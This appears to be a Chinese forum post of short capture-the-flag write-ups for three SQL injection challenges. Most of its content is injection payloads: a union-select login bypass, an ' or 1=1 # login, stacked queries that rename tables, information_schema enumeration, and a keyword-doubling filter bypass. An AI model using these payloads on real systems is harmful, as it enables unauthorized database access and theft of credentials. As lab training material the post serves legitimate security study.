本帖最后由 孤樱懶契 于 2021-8-3 12:48 编辑
[GXYCTF2019]BabySQli
1、测试注入点

2、发现源码里面有base32到base64的解密


select * from user where username = '$name'
判断有一个user表
3、Order by 找字段


4、用联合查询创建虚拟表进行登录



name=1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin
这里比较坑的就是md5加密没有提示
[强网杯 2019]随便注
1、万能密码注入

1
rename table `1919810931114514` to `words`;
alter table words change flag id varchar(100);
show tables;
show columns from words;#

[极客大挑战 2019]LoveSQL
1、万能密码注入
‘ or 1=1 #

2、找字段
' order by 3 #
’ union select 1,2,3; # 找回显
2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #
3、爆表

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser' #

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
2' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #
2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) ffromrom l0ve1ysq1 #

|